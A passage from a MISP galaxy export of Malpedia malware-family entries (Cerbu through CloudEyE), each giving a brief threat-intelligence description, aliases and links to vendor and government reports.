https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/

https://us-cert.cisa.gov/ncas/alerts/aa20-345a

http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-starts-evading-machine-learning/

https://www.virusbulletin.com/virusbulletin/2017/12/vb2017-paper-nine-circles-cerber/

https://www.youtube.com/watch?v=y8Z9KnL8s8s

https://storage.googleapis.com/pub-tools-public-publication-data/pdf/ce44cbda9fdc061050c1d2a5dec0270874a9dc85.pdf

https://news.sophos.com/en-us/2022/06/16/confluence-exploits-used-to-drop-ransomware-on-vulnerable-servers/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://rinseandrepeatanalysis.blogspot.com/2018/08/reversing-cerber-raas.html

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://i.blackhat.com/asia-21/Thursday-Handouts/as21-Taniguchi-How-Did-The-Adversaries-Abusing-The-Bitcoin-Blockchain-Evade-Our-Takeover.pdf

https://www.justice.gov/usao-dc/press-release/file/1021186/download

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks

https://www.youtube.com/watch?v=LUxOcpIRxmg

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://blog.malwarebytes.com/threat-analysis/2016/03/cerber-ransomware-new-but-mature/

Cerbu

This malware family delivers its artifacts packed with free and generic packers. It writes files to Windows temporary folders, downloads additional malware (generally cryptominers) and deletes itself.

The tag is: misp-galaxy:malpedia="Cerbu"

Cerbu is also known as:

Table 3129. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cerbu_miner

ChaChi

The tag is: misp-galaxy:malpedia="ChaChi"

ChaChi is also known as:

Table 3131. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chachi

https://blogs.blackberry.com/en/2021/06/pysa-loves-chachi-a-new-golang-rat

Chaos (Windows)

In-development ransomware family which was released in June 2021 by an unknown threat actor. The builder initially claimed to be a "Ryuk .Net Ransomware Builder" even though it was completely unrelated to the Ryuk malware family. Presently it appears to contain trojan-like features, but lacks features commonly found in ransomware such as data exfiltration.

The tag is: misp-galaxy:malpedia="Chaos (Windows)"

Chaos (Windows) is also known as:

  • FakeRyuk

  • RyukJoke

  • Yashma

Table 3135. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chaos

https://blog.talosintelligence.com/new-threat-actor-using-yashma-ransomware/

https://marcoramilli.com/2021/06/14/the-allegedly-ryuk-ransomware-builder-ryukjoke/

https://research.openanalysis.net/quasar/chaos/rat/ransomware/2023/04/13/quasar-chaos.html

https://www.bleepingcomputer.com/news/security/roblox-game-pass-store-used-to-sell-ransomware-decryptor/

https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-sides-with-russia

https://blogs.blackberry.com/en/2022/05/yashma-ransomware-tracing-the-chaos-family-tree

https://www.fortinet.com/blog/threat-research/chaos-ransomware-variant-in-fake-minecraft-alt-list-brings-destruction

https://threatmon.io/chaos-unleashed-a-technical-analysis-of-a-novel-ransomware/

https://twitter.com/vinopaljiri/status/1519645742440329216

https://www.trendmicro.com/en_us/research/21/h/chaos-ransomware-a-dangerous-proof-of-concept.html

https://brianstadnicki.github.io/posts/malware-chaos-ransomware-v4/

https://blog.qualys.com/vulnerabilities-threat-research/2022/01/17/the-chaos-ransomware-can-be-ravaging

Chaperone

According to Kaspersky GReAT and AMR, TajMahal is a previously unknown and technically sophisticated APT framework discovered by Kaspersky Lab in the autumn of 2018. This full-blown spying framework consists of two packages named Tokyo and Yokohama. It includes backdoors, loaders, orchestrators, C2 communicators, audio recorders, keyloggers, screen and webcam grabbers, document and cryptography key stealers, and even its own file indexer for the victim’s machine. They discovered up to 80 malicious modules stored in its encrypted Virtual File System, one of the highest numbers of plugins they have ever seen for an APT toolset.

The tag is: misp-galaxy:malpedia="Chaperone"

Chaperone is also known as:

  • Taj Mahal

Table 3136. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chaperone

https://securelist.com/apt-trends-report-q2-2019/91897/

https://github.com/TheEnergyStory/malware_analysis/tree/master/TajMahal

https://securelist.com/project-tajmahal/90240/

CHCH

CHCH is a ransomware spotted in the wild in December 2019. It encrypts victim files and adds the extension .chch to them, and drops a ransom note named READ_ME.TXT.

The tag is: misp-galaxy:malpedia="CHCH"

CHCH is also known as:

Table 3138. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chch

https://twitter.com/GrujaRS/status/1205566219971125249

CHEESETRAY

CHEESETRAY is a sophisticated proxy-aware backdoor that can operate in either active or passive mode depending on the passed command-line parameters. The backdoor is capable of enumerating files and processes, enumerating drivers, enumerating remote desktop sessions, uploading and downloading files, creating and terminating processes, deleting files, creating a reverse shell, acting as a proxy server, and hijacking processes, among other functionality. The backdoor communicates with its C&C server using a custom binary protocol over TCP, with the port specified as a command-line parameter.

The tag is: misp-galaxy:malpedia="CHEESETRAY"

CHEESETRAY is also known as:

  • CROWDEDFLOUNDER

Table 3140. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cheesetray

https://www.us-cert.gov/ncas/analysis-reports/ar20-045c

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf

https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/

Chernolocker

Chernolocker is a ransomware that encrypts a victim’s files using AES-256 and demands a ransom in BTC. Different versions are classified by the attacker’s email address, which changes over time.

The tag is: misp-galaxy:malpedia="Chernolocker"

Chernolocker is also known as:

Table 3141. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chernolocker

https://id-ransomware.blogspot.com/2019/12/chernolocker-ransomware.html

ChewBacca

The tag is: misp-galaxy:malpedia="ChewBacca"

ChewBacca is also known as:

Table 3143. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca

http://vinsula.com/2014/03/01/chewbacca-tor-based-pos-malware/

Chimera

According to PCrisk, Chimera is a ransomware virus that encrypts files stored on infected systems. It is distributed using various fake job applications, business offers, and infected email attachments. After encrypting the files, Chimera adds a .crypt extension to each file.

The tag is: misp-galaxy:malpedia="Chimera"

Chimera is also known as:

Table 3144. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chimera

https://www.malwarebytes.com/blog/news/2015/12/inside-chimera-ransomware-the-first-doxingware-in-wild

CHINACHOPPER

A simple code injection webshell that executes Microsoft .NET code passed in HTTP POST requests. This allows the shell to upload and download files, execute applications with the web server account’s permissions, list directory contents, access Active Directory, access databases, and perform any other action allowed by the .NET runtime.

The tag is: misp-galaxy:malpedia="CHINACHOPPER"

CHINACHOPPER is also known as:

Table 3145. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chinachopper

https://www.crowdstrike.com/blog/an-end-to-smash-and-grab-more-targeted-approaches/

https://www.picussecurity.com/resource/blog/ttps-hafnium-microsoft-exchange-servers

https://www.youtube.com/watch?v=rn-6t7OygGk

https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos

https://attack.mitre.org/groups/G0096

https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf

https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders

https://www.imperva.com/blog/imperva-observes-hive-of-activity-following-hafnium-microsoft-exchange-disclosures/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/multi-factor-authentication-new-attacks

https://unit42.paloaltonetworks.com/remediation-steps-for-the-Microsoft-Exchange-Server-vulnerabilities/

https://www.secureworks.com/research/threat-profiles/bronze-president

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection

https://blog.talosintelligence.com/2019/08/china-chopper-still-active-9-years-later.html

https://www.secureworks.com/blog/ongoing-campaign-leveraging-exchange-vulnerability-potentially-linked-to-iran

https://twitter.com/CyberRaiju/status/1373582619707867136

https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf

https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hafnium-china-chopper-and-aspnet-runtime/

https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/

https://www.secureworks.com/research/threat-profiles/bronze-mohawk

https://twitter.com/ESETresearch/status/1366862946488451088

https://www.praetorian.com/blog/reproducing-proxylogon-exploit/

https://www.fireeye.com/blog/threat-research/2021/03/detection-response-to-exploitation-of-microsoft-exchange-zero-day-vulnerabilities.html

https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/

https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/witchetty-steganography-espionage

https://www.microsoft.com/security/blog/2021/03/25/analyzing-attacks-taking-advantage-of-the-exchange-server-vulnerabilities/

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-259a

https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/

https://www.secureworks.com/research/threat-profiles/bronze-atlas

https://www.secureworks.com/research/threat-profiles/bronze-express

https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers

https://techcommunity.microsoft.com/t5/azure-sentinel/web-shell-threat-hunting-with-azure-sentinel/ba-p/2234968

https://unit42.paloaltonetworks.com/microsoft-exchange-server-attack-timeline/

https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/

https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html

https://attack.mitre.org/groups/G0125/

https://redcanary.com/blog/microsoft-exchange-attacks

https://secjoes-reports.s3.eu-central-1.amazonaws.com/Backdoor%2Bvia%2BXFF%2BMysterious%2BThreat%2BActor%2BUnder%2BRadar.pdf

https://www.huntress.com/blog/rapid-response-mass-exploitation-of-on-prem-exchange-servers

https://www.cyborgsecurity.com/blog/you-dont-know-the-hafnium-of-it/

https://informationonsecurity.blogspot.com/2012/11/china-chopper-webshell.html

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf

https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/

https://blog.joshlemon.com.au/hafnium-exchange-attacks/

https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html

https://www.wired.com/story/china-microsoft-exchange-server-hack-victims/

https://us-cert.cisa.gov/ncas/alerts/aa20-275a

https://www.trendmicro.com/en_us/research/21/d/could-the-microsoft-exchange-breach-be-stopped.html

https://www.trendmicro.com/en_us/research/21/d/hello-ransomware-uses-updated-china-chopper-web-shell-sharepoint-vulnerability.html

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Cyber-Sicherheit/Vorfaelle/Exchange-Schwachstellen-2021/MSExchange_Schwachstelle_Detektion_Reaktion.pdf

https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html

https://www.paloaltonetworks.com/blog/security-operations/through-the-cortex-xdr-lens-uncovering-a-new-activity-group-targeting-governments-in-the-middle-east-and-africa/

https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers

https://unit42.paloaltonetworks.com/atoms/iron-taurus/

https://www.secureworks.com/research/threat-profiles/bronze-union

https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers

https://www.huntress.com/hubfs/Mass%20Exploitation%20of%20Microsoft%20Exchange%20(2).pdf

https://www.trendmicro.com/en_us/research/21/a/targeted-attack-using-chopper-aspx-web-shell-exposed-via-managed.html

https://asec.ahnlab.com/en/47455/

https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits

https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf

https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/

https://blog.talosintelligence.com/2021/11/babuk-exploits-exchange.html

https://www.justice.gov/opa/pr/two-chinese-hackers-working-ministry-state-security-charged-global-computer-intrusion

https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/

https://us-cert.cisa.gov/ncas/alerts/aa20-259a

https://unit42.paloaltonetworks.com/china-chopper-webshell/

https://www.fireeye.com/blog/threat-research/2021/09/proxyshell-exploiting-microsoft-exchange-servers.html

https://attack.mitre.org/software/S0020/

https://www.huntress.com/hubfs/Videos/Webinars/Overlay-Mass_Exploitation_of_Exchange.mp4

https://www.devo.com/blog/detect-and-investigate-hafnium-using-devo/

https://adeo.com.tr/wp-content/uploads/2020/02/APT10_Report.pdf

Chinad

Adware that shows advertisements using plugin techniques for popular browsers.

The tag is: misp-galaxy:malpedia="Chinad"

Chinad is also known as:

Table 3146. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chinad

https://www.malwarebytes.com/blog/news/2015/05/unusual-exploit-kit-targets-chinese-users-part-1

https://www.malwarebytes.com/blog/news/2015/06/unusual-exploit-kit-targets-chinese-users-part-2

ChinaJm

Ransomware.

The tag is: misp-galaxy:malpedia="ChinaJm"

ChinaJm is also known as:

Table 3147. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chinajm

https://id-ransomware.blogspot.com/2020/02/chinajm-ransomware.html

Chir

The tag is: misp-galaxy:malpedia="Chir"

Chir is also known as:

Table 3150. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chir

Chisel (Windows)

Chisel is an open-source project by Jaime Pillora (jpillora) that allows tunneling TCP and UDP connections via HTTP. It is available across platforms and written in Go. While benign in itself, Chisel has been utilized by multiple threat actors. It was, for example, observed by SentinelOne during a PYSA ransomware campaign, where it was used to achieve persistence and as a backdoor. Github: https://github.com/jpillora/chisel

The tag is: misp-galaxy:malpedia="Chisel (Windows)"

Chisel (Windows) is also known as:

Table 3151. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.chisel

https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/

https://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/

Choziosi (Windows)

Choziosi is a browser hijacker for Chrome. It was first seen in January 2022. It commonly infects users via pirated media downloads like games, software, wallpapers or movies. The initial infectors are available for several platforms such as Mac and Windows.

Its main component is a Chrome browser extension written in JavaScript with the purpose of serving advertisements and hijacking search requests to Google, Yahoo and Bing.

The tag is: misp-galaxy:malpedia="Choziosi (Windows)"

Choziosi (Windows) is also known as:

  • ChromeLoader

Table 3153. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.choziosi

https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension

https://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension

https://blogs.vmware.com/security/2022/09/the-evolution-of-the-chromeloader-malware.html

https://cybergeeks.tech/chromeloader-browser-hijacker

https://www.connectwise.com/blog/threat-report/smash-jacker

https://redcanary.com/blog/chromeloader/

https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER

cifty

The tag is: misp-galaxy:malpedia="cifty"

cifty is also known as:

Table 3155. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cifty

http://contagiodump.blogspot.com/2009/06/win32updateexe-md5-eec80fd4c7fc5cf5522f.html

Clambling

Clambling was discovered by Trend Micro and TalentJump. It is a custom malware used by an actor they refer to as DRBControl, which targets gambling and betting companies in Southeast Asia. One version of Clambling uses Dropbox as a C&C channel to hide its communication.

The tag is: misp-galaxy:malpedia="Clambling"

Clambling is also known as:

Table 3159. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.clambling

https://documents.trendmicro.com/assets/white_papers/wp-uncovering-DRBcontrol.pdf

https://shared-public-reports.s3-eu-west-1.amazonaws.com/APT27+turns+to+ransomware.pdf

https://www.bleepingcomputer.com/news/security/chinas-apt-hackers-move-to-ransomware-attacks/

CLASSFON

The tag is: misp-galaxy:malpedia="CLASSFON"

CLASSFON is also known as:

Table 3160. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.classfon

https://content.fireeye.com/apt-41/rpt-apt41/

CLEANTOAD

CLEANTOAD is a disruption tool that will delete file system artifacts, including those related to BLINDTOAD, and will run after a date obtained from a configuration file. The malware injects shellcode into notepad.exe and it overwrites and deletes files, modifies registry keys, deletes services, and clears Windows event logs.

The tag is: misp-galaxy:malpedia="CLEANTOAD"

CLEANTOAD is also known as:

Table 3161. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cleantoad

https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/pf/apt/rpt-apt38-2018.pdf

ClipBanker

The ClipBanker Trojan is known as an information stealer and spy trojan. It aims to steal and record any type of sensitive information from the infected environment, such as browser history, cookies, Outlook data, Skype, Telegram, or cryptocurrency wallet account addresses. The main goal of this threat is to steal confidential information. ClipBanker uses PowerShell commands to carry out its malicious activities. What makes ClipBanker distinctive is its ability to record various banking actions of the user and manipulate them for its own benefit. ClipBanker is distributed through phishing emails or through social media posts that lure users into downloading malicious content.

The tag is: misp-galaxy:malpedia="ClipBanker"

ClipBanker is also known as:

Table 3163. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.clipbanker

https://asec.ahnlab.com/en/35981/

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/covid-19-phishing-lure-to-steal-and-mine-cryptocurrency/

https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.cynet.com/attack-techniques-hands-on/threat-research-report-clipbanker-13-second-attack/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf

Clipog

A keylogger.

The tag is: misp-galaxy:malpedia="Clipog"

Clipog is also known as:

Table 3164. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.clipog

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/crambus-middle-east-government

Clop (Windows)

Clop is a ransomware which appends the .clop extension after having encrypted the victim’s files. Another characteristic unique to Clop is the string "Dont Worry C|0P" included in the ransom notes. It is a variant of CryptoMix ransomware, but it additionally attempts to disable Windows Defender and to remove Microsoft Security Essentials in order to avoid user-space detection.

The tag is: misp-galaxy:malpedia="Clop (Windows)"

Clop (Windows) is also known as:

Table 3165. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.clop

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://fourcore.io/blogs/clop-ransomware-history-adversary-simulation

https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/

https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities

https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.bleepingcomputer.com/news/security/indiabulls-group-hit-by-clop-ransomware-gets-24h-leak-deadline/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://twitter.com/darb0ng/status/1338692764121251840

https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do

https://unit42.paloaltonetworks.com/clop-ransomware/

https://www.prodaft.com/m/reports/TeslaGun_TLPWHITE.pdf

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-clop

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://github.com/albertzsigovits/malware-notes/blob/master/Ransomware/Clop.md

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf

https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-English-088056baf01242409a6e9f844f0c5f2e

https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/

https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824

https://asec.ahnlab.com/en/19542/

https://www.zdnet.com/article/croatias-largest-petrol-station-chain-impacted-by-cyber-attack/

https://actu.fr/normandie/rouen_76540/une-rancon-apres-cyberattaque-chu-rouen-ce-reclament-pirates_29475649.html

https://www.boho.or.kr/filedownload.do?attach_file_seq=2808&attach_file_id=EpF2808.pdf

https://www.binance.com/en/blog/421499824684902240/Binance-Helps-Take-Down-Cybercriminal-Ring-Laundering-%24500M-in-Ransomware-Attacks

https://www.notion.so/S2W-LAB-Analysis-of-Clop-Ransomware-suspiciously-related-to-the-Recent-Incident-c26daec604da4db6b3c93e26e6c7aa26

https://therecord.media/ukrainian-police-arrest-clop-ransomware-members-seize-server-infrastructure/

https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/clop-ransomware/

https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://www.bleepingcomputer.com/news/security/ransomware-gang-urges-victims-customers-to-demand-a-ransom-payment/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://medium.com/s2wlab/operation-synctrek-e5013df8d167

https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html

https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf

https://www.bleepingcomputer.com/news/security/cryptomix-clop-ransomware-says-its-targeting-networks-not-computers/

https://www.bleepingcomputer.com/news/security/ta505-hackers-behind-maastricht-university-ransomware-attack/

https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics

https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/

https://krebsonsecurity.com/2021/06/ukrainian-police-nab-six-tied-to-clop-ransomware/

https://medium.com/@Sebdraven/unpacking-clop-416b83718e0f

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.splunk.com/en_us/blog/security/detecting-clop-ransomware.html

https://www.telekom.com/en/blog/group/article/eager-beaver-a-short-overview-of-the-restless-threat-actor-ta505-609546

https://securelist.com/modern-ransomware-groups-ttps/106824/

https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/

https://www.zdnet.com/article/german-tech-giant-software-ag-down-after-ransomware-attack/

https://github.com/albertzsigovits/malware-notes/blob/master/Clop.md

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://asec.ahnlab.com/wp-content/uploads/2021/01/Analysis_ReportCLOP_Ransomware.pdf

https://www.splunk.com/en_us/blog/security/clop-ransomware-detection-threat-research-release-april-2021.html

https://www.hornetsecurity.com/en/security-information/clop-clop-ta505-html-malspam-analysis/

https://research.loginsoft.com/threat-research/taming-the-storm-understanding-and-mitigating-the-consequences-of-cve-2023-27350/

https://github.com/Tera0017/TAFOF-Unpacker

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/

https://www.secureworks.com/research/threat-profiles/gold-tahoe

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf

https://www.youtube.com/watch?v=PqGaZgepNTE

https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-returns-with-a-new-bag-of-tricks-602104

https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://www.carbonblack.com/blog/cb-tau-threat-intelligence-notification-cryptomix-clop-ransomware-disables-startup-repair-removes-edits-shadow-volume-copies/

https://www.bleepingcomputer.com/news/security/ransomware-gang-says-they-stole-2-million-credit-cards-from-e-land/

https://www.bleepingcomputer.com/news/security/clop-ransomware-gang-is-back-hits-21-victims-in-a-single-month/

https://www.mandiant.com/resources/financially-motivated-actors-are-expanding-access-into-ot

https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?blob=publicationFile&v=2

https://www.cert.ssi.gouv.fr/cti/CERTFR-2019-CTI-009/

https://www.vice.com/en/article/wx5eyx/meet-the-ransomware-gang-behind-one-of-the-biggest-supply-chain-hacks-ever

https://labs.sentinelone.com/breaking-ta505s-crypter-with-an-smt-solver/

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/

CLOUDBURST

CLOUDBURST aka NickelLoader is an HTTP(S) downloader.

It recognizes a set of four basic commands, all five letters long, such as abcde, avdrq, gabnc and dcrqv (alternatively: eknag, eacec, hjmwk, wohnp). The most important functionality is to load a received buffer, either as a DLL via the MemoryModule implementation or as shellcode.

It uses AES for encryption and decryption of network traffic. It usually sends the following information back to its C&C server: computer name, product name and the list of running processes. Typically, it uses two hardcoded parameter names for its initial HTTP POST requests: gametype and type (alternatively: type and code).

The CLOUDBURST payload is disguised as mscoree.dll and is side-loaded via a legitimate Windows binary PresentationHost.exe with the argument -embeddingObject. It comes either as a trojanized plugin project for Notepad++ (usually FingerText by erinata), or as a standalone DLL loaded by a dropper, which is a trojanized plugin project as well (usually NppyPlugin by Jari Pennanen).

The CLOUDBURST malware was used in Operation DreamJob attacks against an aerospace company and a network running Microsoft Intune software in Q2-Q3 2022.

The tag is: misp-galaxy:malpedia="CLOUDBURST"

CLOUDBURST is also known as:

  • NickelLoader

Table 3166. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst

https://www.mandiant.com/resources/blog/lightshow-north-korea-unc2970

https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://www.microsoft.com/security/blog/2022/09/29/zinc-weaponizing-open-source-software/

CloudEyE

CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is XOR-encoded.

The tag is: misp-galaxy:malpedia="CloudEyE"

CloudEyE is also known as:

  • GuLoader

  • vbdropper

Table 3167. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

https://www.fortinet.com/blog/threat-research/spoofed-saudi-purchase-order-drops-guloader-part-two

https://inquest.net/blog/2022/08/29/office-files-rtf-files-shellcode-and-more-shenanigans

https://research.checkpoint.com/2020/guloader-cloudeye/

https://research.checkpoint.com/2023/unveiling-the-shadows-the-dark-alliance-between-guloader-and-remcos/

https://www.spamhaus.com/resource-center/dissecting-the-new-shellcode-based-variant-of-guloader-cloudeye/

https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943

https://twitter.com/VK_Intel/status/1252678206852907011

http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa

https://www.youtube.com/watch?v=gk7fCC5RiAQ

https://www.joesecurity.org/blog/3535317197858305930

https://www.vmray.com/cyber-security-blog/guloader-evasion-techniques-threat-bulletin/

https://www.youtube.com/watch?v=K3Yxu_9OUxU

